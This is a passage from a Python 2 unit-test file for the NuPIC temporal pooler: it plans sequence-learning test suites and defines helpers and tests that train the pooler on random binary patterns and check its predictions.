since you could also be starting in the middle of the DABC sequence. All this is
actually happening in the code, but verified by visual inspection only.
HL1) Noise + sequence + noise + sequence repeatedly without resets until it has
learned that sequence. Train the TP repeatedly with N random sequences that all
share a single subsequence. Each random sequence can be 10 patterns long,
sharing a subsequence that is 5 patterns long. There should be no resets
between presentations. Inference should then be on that 5 long shared subsequence.
Example (3-long shared subsequence):
A B C D E F G H I J
K L M D E F N O P Q
R S T D E F U V W X
Y Z 1 D E F 2 3 4 5
TP parameters should be the same as HL0.
HL2) Like HL1, but after A B C has learned, try to learn D A B C . It should learn
ABC is separate from DABC.
HL3) Like HL2, but test with resets.
HL4) Like HL1 but with minThreshold high. This should FAIL and learn a ton
of synapses.
HiLo but with true high order sequences embedded in noise
Present 25 sequences in random order with no resets but noise between
sequences (1-20 samples). Learn all 25 sequences. Test global decay vs non-zero
permanenceDec .
Pooling + HiLo Tests [UNIMPLEMENTED]
====================
Needs to be defined.
Global Decay Tests [UNIMPLEMENTED]
==================
Simple tests to ensure global decay is actually working.
Sequence Likelihood Tests
=========================
These tests are in the file TPLikelihood.py
Segment Learning Tests [UNIMPLEMENTED]
======================
Multi-attribute sequence tests.
SL1) Train the TP repeatedly using a single (multiple) sequence plus noise. The
sequence can be relatively short, say 20 patterns. No two consecutive patterns
in the sequence should share columns. Add random noise each time a pattern is
presented. The noise should be different for each presentation and can be equal
to the number of on bits in the pattern. After N iterations of the noisy
sequences, the TP should should achieve perfect inference on the true sequence.
There should be resets between each presentation of the sequence.
Check predictions in the sequence only. And test with clean sequences.
Vary percentage of bits that are signal vs noise.
Noise can be a fixed alphabet instead of being randomly generated.
HL2) As above, but with no resets.
Shared Column Tests [UNIMPLEMENTED]
===================
Carefully test what happens when consecutive patterns in a sequence share
columns.
Sequence Noise Tests [UNIMPLEMENTED]
====================
Note: I don't think these will work with the current logic. Need to discuss
whether we want to accommodate sequence noise like this.
SN1) Learn sequence with pooling up to T timesteps. Run inference on a sequence
and occasionally drop elements of a sequence. Inference should still work.
SN2) As above, but occasionally add a random pattern into a sequence.
SN3) A combination of the above two.
Capacity Tests [UNIMPLEMENTED]
==============
These are stress tests that verify that the temporal pooler can learn a large
number of sequences and can predict a large number of possible next steps. Some
research needs to be done first to understand the capacity of the system as it
relates to the number of columns, cells per column, etc.
Token Prediction Tests: Test how many predictions of individual tokens we can
superimpose and still recover.
Online Learning Tests [UNIMPLEMENTED]
=====================
These tests will verify that the temporal pooler continues to work even if
sequence statistics (and the actual sequences) change slowly over time. The TP
should adapt to the changes and learn to recognize newer sequences (and forget
the older sequences?).
"""
import random
import numpy
from numpy import *
import sys
import pickle
import cPickle
import pprint
from nupic.research.TP import TP
from nupic.research.TP10X2 import TP10X2
from nupic.research import fdrutilities as fdrutils
#---------------------------------------------------------------------------------
TEST_CPP_TP = 1 # temporarily disabled until it can be updated
VERBOSITY = 0 # how chatty the unit tests should be
SEED = 33 # the random seed used throughout
TPClass = TP
checkSynapseConsistency = False
rgen = numpy.random.RandomState(SEED) # always call this rgen, NOT random
#---------------------------------------------------------------------------------
# Helper routines
#--------------------------------------------------------------------------------
#---------------------------------------------------------------------------------
def printOneTrainingVector(x):
print ''.join('1' if k != 0 else '.' for k in x)
#---------------------------------------------------------------------------------
def printAllTrainingSequences(trainingSequences, upTo = 99999):
  """Print all training sequences side by side, one time step per row.

  trainingSequences: list of sequences, each a list of pattern vectors;
                     all sequences are assumed to have the same length as
                     the first one.
  upTo:              print at most this many time steps.
  """
  for t in xrange(min(len(trainingSequences[0]), upTo)):
    # Trailing commas keep all sequences for time step t on one line.
    print 't=',t,
    for i,trainingSequence in enumerate(trainingSequences):
      print "\tseq#",i,'\t',
      printOneTrainingVector(trainingSequences[i][t])
#---------------------------------------------------------------------------------
def generatePattern(numCols = 100,
                    minOnes =21,
                    maxOnes =25,
                    colSet = frozenset(),
                    prevPattern =None):
  """Generate a single test pattern with given parameters.

  Parameters:
  --------------------------------------------
  numCols:      Number of columns in each pattern.
  minOnes:      The minimum number of 1's in each pattern.
  maxOnes:      The maximum number of 1's in each pattern. Note that numpy's
                randint excludes the high bound, so the actual count is drawn
                from [minOnes, maxOnes).
  colSet:       The set of column indices for the pattern. The previous
                default ([]) was a list, which has no .difference() method
                and crashed whenever the argument was omitted; an empty
                frozenset is a safe, immutable default.
  prevPattern:  Pattern to avoid (null intersection). None (the default)
                means "no pattern to avoid"; using None instead of a shared
                module-level numpy array avoids the mutable-default pitfall.
  """
  assert minOnes < maxOnes
  assert maxOnes < numCols

  if prevPattern is None:
    prevPattern = numpy.array([])

  nOnes = rgen.randint(minOnes, maxOnes)
  # Candidate columns: everything in colSet not used by the previous pattern,
  # so consecutive patterns never share columns.
  candidates = list(colSet.difference(set(prevPattern.nonzero()[0])))
  rgen.shuffle(candidates)
  ind = candidates[:nOnes]
  x = numpy.zeros(numCols, dtype='float32')
  x[ind] = 1
  return x
#---------------------------------------------------------------------------------
def buildTrainingSet(numSequences = 2,
                     sequenceLength = 100,
                     pctShared = 0.2,
                     seqGenMode = 'shared sequence',
                     subsequenceStartPos = 10,
                     numCols = 100,
                     minOnes=21,
                     maxOnes = 25,
                     disjointConsecutive =True):
  """Build random high order test sequences.

  Parameters:
  --------------------------------------------
  numSequences:        The number of sequences created.
  sequenceLength:      The length of each sequence.
  pctShared:           The percentage of sequenceLength that is shared across
                       every sequence. If sequenceLength is 100 and pctShared
                       is 0.2, then a subsequence consisting of 20 patterns
                       will be in every sequence. Can also be the keyword
                       'one pattern', in which case a single time step is shared.
  seqGenMode:          What kind of sequence to generate. If contains 'shared'
                       generates shared subsequence. If contains 'no shared',
                       does not generate any shared subsequence. If contains
                       'shuffle', will use common patterns shuffle among the
                       different sequences. If contains 'beginning', will
                       place shared subsequence at the beginning.
  subsequenceStartPos: The position where the shared subsequence starts
  numCols:             Number of columns in each pattern.
  minOnes:             The minimum number of 1's in each pattern.
  maxOnes:             The maximum number of 1's in each pattern.
  disjointConsecutive: Whether to generate disjoint consecutive patterns or not.

  Returns a tuple (trainingSequences, endOfSharedSubsequence) where the
  second element is -1 when no subsequence is shared.
  """
  # Calculate the set of column indexes once to be used in each call to generatePattern()
  colSet = set(range(numCols))

  # 'beginning' only makes sense when a shared subsequence is requested.
  if 'beginning' in seqGenMode:
    assert 'shared' in seqGenMode and 'no shared' not in seqGenMode

  # A single sequence cannot share anything with another one.
  if 'no shared' in seqGenMode or numSequences == 1:
    pctShared = 0.0

  #--------------------------------------------------------------------------------
  # Build shared subsequence
  if 'no shared' not in seqGenMode and 'one pattern' not in seqGenMode:
    sharedSequenceLength = int(pctShared*sequenceLength)
  elif 'one pattern' in seqGenMode:
    sharedSequenceLength = 1
  else:
    sharedSequenceLength = 0

  assert sharedSequenceLength + subsequenceStartPos < sequenceLength

  sharedSequence = []
  for i in xrange(sharedSequenceLength):
    # Passing the previous pattern keeps consecutive patterns disjoint.
    if disjointConsecutive and i > 0:
      x = generatePattern(numCols, minOnes, maxOnes, colSet, sharedSequence[i-1])
    else:
      x = generatePattern(numCols, minOnes, maxOnes, colSet)
    sharedSequence.append(x)

  #--------------------------------------------------------------------------------
  # Build random training set, splicing in the shared subsequence
  trainingSequences = []
  if 'beginning' not in seqGenMode:
    trailingLength = sequenceLength - sharedSequenceLength - subsequenceStartPos
  else:
    trailingLength = sequenceLength - sharedSequenceLength

  for k,s in enumerate(xrange(numSequences)):

    # TODO: implement no repetitions
    if len(trainingSequences) > 0 and 'shuffle' in seqGenMode:
      # Shuffle the previous sequence's non-shared positions while keeping
      # the shared subsequence fixed in place.
      r = range(subsequenceStartPos) \
          + range(subsequenceStartPos + sharedSequenceLength, sequenceLength)
      rgen.shuffle(r)
      r = r[:subsequenceStartPos] \
          + range(subsequenceStartPos, subsequenceStartPos + sharedSequenceLength) \
          + r[subsequenceStartPos:]
      sequence = [trainingSequences[k-1][j] for j in r]
    else:
      sequence = []
      # Leading random patterns (skipped when the shared part goes first).
      if 'beginning' not in seqGenMode:
        for i in xrange(subsequenceStartPos):
          if disjointConsecutive and i > 0:
            x = generatePattern(numCols, minOnes, maxOnes, colSet, sequence[i-1])
          else:
            x = generatePattern(numCols, minOnes, maxOnes, colSet)
          sequence.append(x)
      if 'shared' in seqGenMode and 'no shared' not in seqGenMode:
        sequence.extend(sharedSequence)
      # Trailing random patterns to pad out to sequenceLength.
      for i in xrange(trailingLength):
        if disjointConsecutive and i > 0:
          x = generatePattern(numCols, minOnes, maxOnes, colSet, sequence[i-1])
        else:
          x = generatePattern(numCols, minOnes, maxOnes, colSet)
        sequence.append(x)

    assert len(sequence) == sequenceLength
    trainingSequences.append(sequence)

  assert len(trainingSequences) == numSequences
  if VERBOSITY >= 2:
    print "Training Sequences"
    pprint.pprint(trainingSequences)

  if sharedSequenceLength > 0:
    return (trainingSequences, subsequenceStartPos + sharedSequenceLength)
  else:
    return (trainingSequences, -1)
#---------------------------------------------------------------------------------
def getSimplePatterns(numOnes, numPatterns):
  """Return numPatterns binary vectors, each numOnes*numPatterns wide.

  Pattern i has numOnes consecutive 1 bits starting at column i*numOnes,
  so no two patterns share any columns.
  """
  width = numOnes * numPatterns
  patterns = []
  for start in range(0, width, numOnes):
    v = numpy.zeros(width, dtype='float32')
    v[start:start + numOnes] = 1
    patterns.append(v)
  return patterns
#---------------------------------------------------------------------------------
def buildSimpleTrainingSet(numOnes=5):
  """Two very simple high order sequences for debugging. Each pattern in the
  sequence has a series of 1's in a specific set of columns.

  Returns (trainingSequences, 5): both 7-step sequences share the
  subsequence p2 p3 p4 at positions 2-4.
  """
  p = getSimplePatterns(numOnes, 11)
  seq1 = [p[idx] for idx in (0, 1, 2, 3, 4, 5, 6)]
  seq2 = [p[idx] for idx in (7, 8, 2, 3, 4, 9, 10)]
  return ([seq1, seq2], 5)
#---------------------------------------------------------------------------------
def buildAlternatingTrainingSet(numOnes=5):
  """High order sequences that alternate elements. Pattern i has one's in
  i*numOnes to (i+1)*numOnes.

  The sequences are:
  A B A B A C
  A B A B D E
  A B F G H I
  A J K L M N
  """
  p = getSimplePatterns(numOnes, 14)
  indexSequences = (
      (0, 1, 0, 1, 0, 2),
      (0, 1, 0, 1, 3, 4),
      (0, 1, 5, 6, 7, 8),
      (0, 9, 10, 11, 12, 13),
  )
  trainingSequences = [[p[i] for i in seq] for seq in indexSequences]
  return (trainingSequences, 5)
#---------------------------------------------------------------------------------
def buildHL0aTrainingSet(numOnes=5):
  """Simple sequences for HL0. Each pattern in the sequence has a series of 1's
  in a specific set of columns.

  There are 23 patterns, p0 to p22.
  The sequence we want to learn is p0->p1->p2.
  We create a very long sequence consisting of N N p0 p1 p2 N N p0 p1 p2 ...
  where N is randomly chosen from p3 to p22.
  """
  p = getSimplePatterns(numOnes, 23)

  def noisePattern():
    # Noise patterns are drawn uniformly from p3..p22 (randint's high
    # bound is exclusive). Call order matches the original so the shared
    # rgen state produces identical sequences.
    return p[rgen.randint(3, 23)]

  s = [noisePattern()]
  for _ in xrange(20):
    s.append(noisePattern())
    s.append(p[0])
    s.append(p[1])
    s.append(p[2])
    s.append(noisePattern())

  return ([s], [[p[0], p[1], p[2]]])
#---------------------------------------------------------------------------------
def buildHL0bTrainingSet(numOnes=5):
  """Simple sequences for HL0b. Each pattern in the sequence has a series of 1's
  in a specific set of columns.

  There are 23 patterns, p0 to p22.
  The sequences we want to learn are p1->p2->p3 and p0->p1->p2->p4.
  We create a very long sequence consisting of these two sub-sequences
  intermixed with noise, such as:
    N N p0 p1 p2 p4 N N p1 p2 p3 N N p1 p2 p3
  N is randomly chosen from p5 to p22
  """
  numPatterns = 23
  p = getSimplePatterns(numOnes, numPatterns)
  s = []
  # Leading noise pattern (randint's high bound is exclusive: p5..p22).
  s.append(p[rgen.randint(5,numPatterns)])
  for _ in xrange(50):
    # Noise pattern before the embedded subsequence; the bare prints
    # (trailing commas) trace which patterns/branches were chosen.
    r = rgen.randint(5,numPatterns)
    print r,
    s.append(p[r])
    # Coin flip picks which of the two subsequences to embed.
    if rgen.binomial(1, 0.5) > 0:
      print "S1",
      s.append(p[0])
      s.append(p[1])
      s.append(p[2])
      s.append(p[4])
    else:
      print "S2",
      s.append(p[1])
      s.append(p[2])
      s.append(p[3])
    # Noise pattern after the subsequence.
    r = rgen.randint(5,numPatterns)
    s.append(p[r])
    print r,
  print

  # Return the long noisy sequence plus the two target subsequences.
  return ([s], [ [p[0], p[1], p[2], p[4]], [p[1], p[2], p[3]] ])
#---------------------------------------------------------------------------------
#---------------------------------------------------------------------------------
# Basic test (creation, pickling, basic run of learning and inference)
#---------------------------------------------------------------------------------
def basicTest():
  """Smoke test: create a TP, pickle/unpickle it and check that its
  parameters survive the round trip, then run a few learn() and infer()
  steps on random inputs.

  Reads the module globals TPClass, SEED, VERBOSITY and
  checkSynapseConsistency; writes 'test_tp.pkl' in the current directory
  as a side effect.  Raises AssertionError on any mismatch.
  """
  global TPClass, SEED, VERBOSITY, checkSynapseConsistency

  #--------------------------------------------------------------------------------
  # Create TP object
  numberOfCols =10
  cellsPerColumn =3
  initialPerm =.2
  connectedPerm =.8
  minThreshold =2
  newSynapseCount =5
  permanenceInc =.1
  permanenceDec =.05
  permanenceMax =1
  globalDecay =.05
  activationThreshold =4 # low for those basic tests on purpose
  doPooling =True
  segUpdateValidDuration =5
  seed =SEED
  verbosity =VERBOSITY

  tp = TPClass(numberOfCols, cellsPerColumn,
               initialPerm, connectedPerm,
               minThreshold, newSynapseCount,
               permanenceInc, permanenceDec, permanenceMax,
               globalDecay, activationThreshold,
               doPooling, segUpdateValidDuration,
               seed=seed, verbosity=verbosity,
               pamLength = 1000,
               checkSynapseConsistency=checkSynapseConsistency)

  print "Creation ok"

  #--------------------------------------------------------------------------------
  # Save and reload through a pickle round trip, then verify every
  # construction parameter was preserved.
  pickle.dump(tp, open("test_tp.pkl", "wb"))
  tp2 = pickle.load(open("test_tp.pkl"))

  assert tp2.numberOfCols == numberOfCols
  assert tp2.cellsPerColumn == cellsPerColumn
  print tp2.initialPerm
  # Float parameters are stored as numpy.float32 inside the TP, so compare
  # against numpy.float32 literals rather than plain Python floats.
  assert tp2.initialPerm == numpy.float32(.2)
  assert tp2.connectedPerm == numpy.float32(.8)
  assert tp2.minThreshold == minThreshold
  assert tp2.newSynapseCount == newSynapseCount
  assert tp2.permanenceInc == numpy.float32(.1)
  assert tp2.permanenceDec == numpy.float32(.05)
  assert tp2.permanenceMax == 1
  assert tp2.globalDecay == numpy.float32(.05)
  assert tp2.activationThreshold == activationThreshold
  assert tp2.doPooling == doPooling
  assert tp2.segUpdateValidDuration == segUpdateValidDuration
  assert tp2.seed == SEED
  assert tp2.verbosity == verbosity

  print "Save/load ok"

  #--------------------------------------------------------------------------------
  # Learn on a handful of random binary vectors.
  for i in xrange(5):
    xi = rgen.randint(0,2,(numberOfCols))
    x = numpy.array(xi, dtype="uint32")
    y = tp.learn(x)

  #--------------------------------------------------------------------------------
  # Infer on random vectors, scoring predictions against random patterns
  # (only exercises the code path; the score itself is not checked).
  patterns = rgen.randint(0,2,(4,numberOfCols))
  for i in xrange(10):
    xi = rgen.randint(0,2,(numberOfCols))
    x = numpy.array(xi, dtype="uint32")
    y = tp.infer(x)
    if i > 0:
      p = tp.checkPrediction2([pattern.nonzero()[0] for pattern in patterns])

  print "basicTest ok"
#---------------------------------------------------------------------------------
# Figure out acceptable patterns if none were passed to us.
def findAcceptablePatterns(tp, t, whichSequence, trainingSequences, nAcceptable = 1):
"""
Tries to infer the set of acceptable patterns for prediction at the given
time step and for the give sequence. Acceptable patterns are: the current one,
plus a certain number of patterns after timeStep, in the sequence that the TP
is currently tracking. Any other pattern is not acceptable.
TODO:
====
- Doesn't work for noise cases.
- Might run in trouble if shared subsequence at the beginning.
Parameters:
==========
tp the whole TP, so that we can look at its parameters
t the current time step
whichSequence the sequence we are currently tracking
trainingSequences all the training sequences
nAcceptable the number of steps forward from the current timeStep
we are willing to consider acceptable. In the case of
pooling, it is less than or equal to the min of the
number of training reps and the segUpdateValidDuration
parameter of the TP, depending on the test case.
The default value is 1, because by default, the pattern
after the current one should always be predictable.
Return value:
============
acceptablePatterns A list of acceptable patterns for prediction.
"""
# Determine how many steps forward we want to see in the prediction
upTo = t + 2 # always predict current and next
# If the TP is pooling, more steps can be predicted
if tp.doPooling:
upTo += min(tp.segUpdateValidDuration, nAcceptable)
assert upTo <= len(trainingSequences[whichSequence])
acceptablePatterns = []
# Check whether we were in a shared subsequence at the beginning.
# If so, at the point of exiting the shared subsequence (t), we should
# be predicting multiple patterns for 1 time step, then collapse back
# to a single sequence.
if len(trainingSequences) == 2 and \
(trainingSequences[0][0] == trainingSequences[1][0]).all():
if (trainingSequences[0][t] == trainingSequences[1][t]).all() \
and (trainingSequences[0][t+1] != trainingSequences[1][t+1]).any():
acceptablePatterns.append(trainingSequences[0][t+1])
acceptablePatterns.append(trainingSequences[1][t+1])
# Add patterns going forward
acceptablePatterns += [trainingSequences[whichSequence][t] \
for t in xrange(t,upTo)]
return acceptablePatterns
#---------------------------------------------------------------------------------
def testSequence(trainingSequences,
nTrainingReps = 1,
numberOfCols = 40,
cellsPerColumn =5,
initialPerm =.8,
connectedPerm =.7,
minThreshold = 11,
newSynapseCount =5,
permanenceInc =.4,
permanenceDec =0.0,
permanenceMax =1,
globalDecay =0.0,
pamLength = 1000,
activationThreshold =5,
acceptablePatterns = [], # if empty, try to infer what they are
doPooling = False,
nAcceptable = -1, # if doPooling, number of acceptable steps
noiseModel = None,
noiseLevel = 0,
doResets = True,
shouldFail = False,
testSequences = None,
predJustAfterHubOnly = None,
compareToPy = False,
nMultiStepPrediction = 0,
highOrder = False):
"""Test a single set of sequences once and return the number of
prediction failures, the number of errors, and the number of perfect
predictions"""
global TP, SEED, checkSynapseConsistency, VERBOSITY
numPerfect = 0 # When every column is correct in the prediction
numStrictErrors = 0 # When at least one column is incorrect
numFailures = 0 # When > 2 columns are incorrect
sequenceLength = len(trainingSequences[0])
segUpdateValidDuration =5
verbosity = VERBOSITY
# override default maxSeqLEngth value for high-order sequences
if highOrder:
tp = TPClass(numberOfCols, cellsPerColumn,
initialPerm, connectedPerm,
minThreshold, newSynapseCount,
permanenceInc, permanenceDec, permanenceMax,
globalDecay, activationThreshold,
doPooling, segUpdateValidDuration,
seed=SEED, verbosity=verbosity,
checkSynapseConsistency=checkSynapseConsistency,
pamLength=pamLength,
maxSeqLength=0
)
else:
tp = TPClass(numberOfCols, cellsPerColumn,
initialPerm, connectedPerm,
minThreshold, newSynapseCount,
permanenceInc, permanenceDec, permanenceMax,
globalDecay, activationThreshold,
doPooling, segUpdateValidDuration,
seed=SEED, verbosity=verbosity,
checkSynapseConsistency=checkSynapseConsistency,
pamLength=pamLength
)
if compareToPy:
# override default maxSeqLEngth value for high-order sequences
if highOrder:
py_tp = TP(numberOfCols, cellsPerColumn,
initialPerm, connectedPerm,
minThreshold, newSynapseCount,
permanenceInc, permanenceDec, permanenceMax,
globalDecay, activationThreshold,
doPooling, segUpdateValidDuration,
seed=SEED, verbosity=verbosity,
pamLength=pamLength,
maxSeqLength=0
)
else:
py_tp = TP(numberOfCols, cellsPerColumn,
initialPerm, connectedPerm,
minThreshold, newSynapseCount,
permanenceInc, permanenceDec, permanenceMax,
globalDecay, activationThreshold,
doPooling, segUpdateValidDuration,
seed=SEED, verbosity=verbosity,
pamLength=pamLength,
)
trainingSequences = trainingSequences[0]
if testSequences == None: testSequences = trainingSequences
inferAcceptablePatterns = acceptablePatterns == []
#--------------------------------------------------------------------------------
# Learn
for r in xrange(nTrainingReps):
if VERBOSITY > 1:
print "============= Learning round",r,"================="
for sequenceNum, trainingSequence in enumerate(trainingSequences):
if VERBOSITY > 1:
print "============= New sequence ================="
if doResets:
tp.reset()
if compareToPy:
py_tp.reset()
for t,x in enumerate(trainingSequence):
if noiseModel is not None and \
'xor' in noiseModel and 'binomial' in noiseModel \
and 'training' in noiseModel:
noise_vector = rgen.binomial(len(x), noiseLevel, (len(x)))
x = logical_xor(x, noise_vector)
if VERBOSITY > 2:
print "Time step",t, "learning round",r, "sequence number", sequenceNum
print "Input: ",tp.printInput(x)
print "NNZ:", x.nonzero()
x = numpy.array(x).astype('float32')
y = tp.learn(x)
if compareToPy:
py_y = py_tp.learn(x)
if t % 25 == 0: # To track bugs, do that every iteration, but very slow
assert fdrutils.tpDiff(tp, py_tp, VERBOSITY) == True
if VERBOSITY > 3:
tp.printStates(printPrevious = (VERBOSITY > 4))
print
if VERBOSITY > 3:
print "Sequence finished. Complete state after sequence"
tp.printCells()
print
numPerfectAtHub = 0
if compareToPy:
print "End of training"
assert fdrutils.tpDiff(tp, py_tp, VERBOSITY) == True
#--------------------------------------------------------------------------------
# Infer
if VERBOSITY > 1: print "============= Inference ================="
for s,testSequence in enumerate(testSequences):
if VERBOSITY > 1: print "============= New sequence ================="
if doResets:
tp.reset()
if compareToPy:
py_tp.reset()
slen = len(testSequence)
for t,x in enumerate(testSequence):
# Generate noise (optional)
if noiseModel is not None and \
'xor' in noiseModel and 'binomial' in noiseModel \
and 'inference' in noiseModel:
noise_vector = rgen.binomial(len(x), noiseLevel, (len(x)))
x = logical_xor(x, noise_vector)
if VERBOSITY > 2: print "Time step",t, '\nInput:', tp.printInput(x)
x = numpy.array(x).astype('float32')
y = tp.infer(x)
if compareToPy:
py_y = py_tp.infer(x)
assert fdrutils.tpDiff(tp, py_tp, VERBOSITY) == True
# if t == predJustAfterHubOnly:
# z = sum(y, axis = 1)
# print '\t\t',
# print ''.join('.' if z[i] == 0 else '1' for i in xrange(len(z)))
if VERBOSITY > 3: tp.printStates(printPrevious = (VERBOSITY > 4),
printLearnState = False); print
if nMultiStepPrediction > 0:
y_ms = tp.predict(nSteps=nMultiStepPrediction)
if VERBOSITY > 3:
print "Multi step prediction at Time step", t
for i in range(nMultiStepPrediction):
print "Prediction at t+", i+1
tp.printColConfidence(y_ms[i])
# Error Checking
for i in range(nMultiStepPrediction):
predictedTimeStep = t+i+1
if predictedTimeStep < slen:
input = testSequence[predictedTimeStep].nonzero()[0]
prediction = y_ms[i].nonzero()[0]
foundInInput, totalActiveInInput, \
missingFromInput, totalActiveInPrediction = \
fdrutils.checkMatch(input, prediction, sparse=True)
falseNegatives = totalActiveInInput - foundInInput
falsePositives = missingFromInput
if VERBOSITY > 2:
print "Predition from %d to %d" % (t, t+i+1)
print "\t\tFalse Negatives:", falseNegatives
print "\t\tFalse Positivies:", falsePositives
if falseNegatives > 0 or falsePositives > 0:
numStrictErrors += 1
if falseNegatives > 0 and VERBOSITY > 1:
print "Multi step prediction from t=", t, "to t=", t+i+1,\
"false negative with error=",falseNegatives,
print "out of", totalActiveInInput,"ones"
if falsePositives > 0 and VERBOSITY > 1:
print "Multi step prediction from t=", t, "to t=", t+i+1,\
"false positive with error=",falsePositives,
print "out of",totalActiveInInput,"ones"
if falsePositives > 3 or falseNegatives > 3:
numFailures += 1
# Analyze the failure if we care about it
if VERBOSITY > 1 and not shouldFail:
print 'Input at t=', t
print '\t\t',; printOneTrainingVector(testSequence[t])
print 'Prediction for t=', t+i+1
print '\t\t',; printOneTrainingVector(y_ms[i])
print 'Actual input at t=', t+i+1
print '\t\t',; printOneTrainingVector(testSequence[t+i+1])
if t < slen-1:
# If no acceptable patterns were passed to us, we need to infer them
# for the current sequence and time step by looking at the testSequences.
# nAcceptable is used to reduce the number of automatically determined
# acceptable patterns.
if inferAcceptablePatterns:
acceptablePatterns = findAcceptablePatterns(tp, t, s, testSequences,
nAcceptable)
scores = tp.checkPrediction2([pattern.nonzero()[0] \
for pattern in acceptablePatterns])
falsePositives, falseNegatives = scores[0], scores[1]
# We report an error if FN or FP is > 0.
# We report a failure if number of FN or number of FP is > 2 for any
# pattern. We also count the number of perfect predictions.
if falseNegatives > 0 or falsePositives > 0:
numStrictErrors += 1
if falseNegatives > 0 and VERBOSITY > 1:
print "Pattern",s,"time",t,\
"prediction false negative with error=",falseNegatives,
print "out of",int(testSequence[t+1].sum()),"ones"
if falsePositives > 0 and VERBOSITY > 1:
print "Pattern",s,"time",t,\
"prediction false positive with error=",falsePositives,
print "out of",int(testSequence[t+1].sum()),"ones"
if falseNegatives > 3 or falsePositives > 3:
numFailures += 1
# Analyze the failure if we care about it
if VERBOSITY > 1 and not shouldFail:
print 'Test sequences'
if len(testSequences) > 1:
printAllTrainingSequences(testSequences, t+1)
else:
print '\t\t',; printOneTrainingVector(testSequence[t])
print '\t\t',; printOneTrainingVector(testSequence[t+1])
print 'Acceptable'
for p in acceptablePatterns:
print '\t\t',; printOneTrainingVector(p)
print 'Output'
diagnostic = ''
output = sum(tp.currentOutput,axis=1)
print '\t\t',; printOneTrainingVector(output)
else:
numPerfect += 1
if predJustAfterHubOnly is not None and predJustAfterHubOnly == t:
numPerfectAtHub += 1
if predJustAfterHubOnly is None:
return numFailures, numStrictErrors, numPerfect, tp
else:
return numFailures, numStrictErrors, numPerfect, numPerfectAtHub, tp
#---------------------------------------------------------------------------------
#---------------------------------------------------------------------------------
def TestB1(numUniquePatterns, nTests, cellsPerColumn = 1, name = "B1"):
numCols = 100
sequenceLength = numUniquePatterns
nFailed = 0
for numSequences in [1]:
print "Test "+name+" (sequence memory - 1 repetition - 1 sequence)"
for k in range(nTests): # Test that configuration several times
trainingSet = buildTrainingSet(numSequences =numSequences,
sequenceLength = sequenceLength,
pctShared = 0.0,
subsequenceStartPos = 0,
numCols = numCols,
minOnes = 15, maxOnes = 20)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = 1,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
initialPerm = .8,
connectedPerm = .7,
minThreshold = 8,
newSynapseCount = 11,
permanenceInc = .4,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
activationThreshold = 8,
doPooling = False)
if numFailures == 0:
print "Test "+name+" ok"
else:
print "Test "+name+" failed"
nFailed = nFailed + 1
print "numFailures=", numFailures
print "numStrictErrors=", numStrictErrors
print "numPerfect=", numPerfect
return nFailed
def TestB7(numUniquePatterns, nTests, cellsPerColumn = 1, name = "B7"):
numCols = 100
sequenceLength = numUniquePatterns
nFailed = 0
for numSequences in [1]:
print "Test "+name+" (sequence memory - 4 repetition - 1 sequence - slow learning)"
for _ in range(nTests): # Test that configuration several times
trainingSet = buildTrainingSet(numSequences =numSequences,
sequenceLength = sequenceLength,
pctShared = 0.0,
subsequenceStartPos = 0,
numCols = numCols,
minOnes = 15, maxOnes = 20)
numFailures, numStrictErrors, numPerfect, tp = \
testSequence(trainingSet,
nTrainingReps = 4,
numberOfCols = numCols,
cellsPerColumn = cellsPerColumn,
minThreshold = 11,
newSynapseCount = 11,
activationThreshold = 11,
initialPerm = .2,
connectedPerm = .6,
permanenceInc = .2,
permanenceDec = 0,
permanenceMax = 1,
globalDecay = .0,
doPooling = False)
if numFailures == 0:
print "Test "+name+" ok"
else:
print "Test "+name+" failed"
nFailed = nFailed + 1
print "numFailures=", numFailures,
print "numStrictErrors=", numStrictErrors,
print "numPerfect=", numPerfect
return nFailed
#---------------------------------------------------------------------------------
def TestB2(numUniquePatterns, nTests, cellsPerColumn = 1, name = "B2"):
  """Check that re-training on the same sequence is idempotent: a second
  pass over an already-learned sequence must not add segments or synapses.

  Trains one TP for 1 repetition and another for 2 repetitions on the same
  data, then compares their getSegmentInfo() counts.  Returns the number
  of failed configurations.
  """
  numCols = 100
  sequenceLength = numUniquePatterns
  nFailed = 0

  for numSequences in [1]: # TestC has multiple sequences
    print "Test",name,"(sequence memory - second repetition of the same sequence" +\
          " should not add synapses)"
    print "Num patterns in sequence =", numUniquePatterns,
    print "cellsPerColumn=",cellsPerColumn

    for _ in range(nTests): # Test that configuration several times

      trainingSet = buildTrainingSet(numSequences =numSequences,
                                     sequenceLength = sequenceLength,
                                     pctShared = 0.0,
                                     subsequenceStartPos = 0,
                                     numCols = numCols,
                                     minOnes = 15, maxOnes = 20)

      # Do one pass through the training set
      numFailures1, numStrictErrors1, numPerfect1, tp1 = \
          testSequence(trainingSet,
                       nTrainingReps = 1,
                       numberOfCols = numCols,
                       cellsPerColumn = cellsPerColumn,
                       initialPerm = .8,
                       connectedPerm = .7,
                       minThreshold = 8,
                       newSynapseCount = 11,
                       permanenceInc = .4,
                       permanenceDec = 0,
                       permanenceMax = 1,
                       globalDecay = .0,
                       activationThreshold = 8)

      # Do two passes through the training set
      numFailures, numStrictErrors, numPerfect, tp2 = \
          testSequence(trainingSet,
                       nTrainingReps = 2,
                       numberOfCols = numCols,
                       cellsPerColumn = cellsPerColumn,
                       initialPerm = .8,
                       connectedPerm = .7,
                       minThreshold = 8,
                       newSynapseCount = 11,
                       permanenceInc = .4,
                       permanenceDec = 0,
                       permanenceMax = 1,
                       globalDecay = .0,
                       activationThreshold = 8)

      # Check that training with a second pass did not result in more synapses.
      # getSegmentInfo()[0] is the segment count, [1] the synapse count.
      segmentInfo1 = tp1.getSegmentInfo()
      segmentInfo2 = tp2.getSegmentInfo()
      if (segmentInfo1[0] != segmentInfo2[0]) or \
         (segmentInfo1[1] != segmentInfo2[1]) :
        print "Training twice incorrectly resulted in more segments or synapses"
        print "Number of segments: ", segmentInfo1[0], segmentInfo2[0]
        numFailures += 1

      if numFailures == 0:
        print "Test",name,"ok"
      else:
        print "Test",name,"failed"
        nFailed = nFailed + 1
        print "numFailures=", numFailures
        print "numStrictErrors=", numStrictErrors
        print "numPerfect=", numPerfect

  return nFailed
#---------------------------------------------------------------------------------
def TestB3(numUniquePatterns, nTests):
numCols = 100
sequenceLength = numUniquePatterns
nFailed = 0
for numSequences in [2,5]:
print "Test B3 (sequence memory - 2 repetitions -", numSequences, "sequences)"
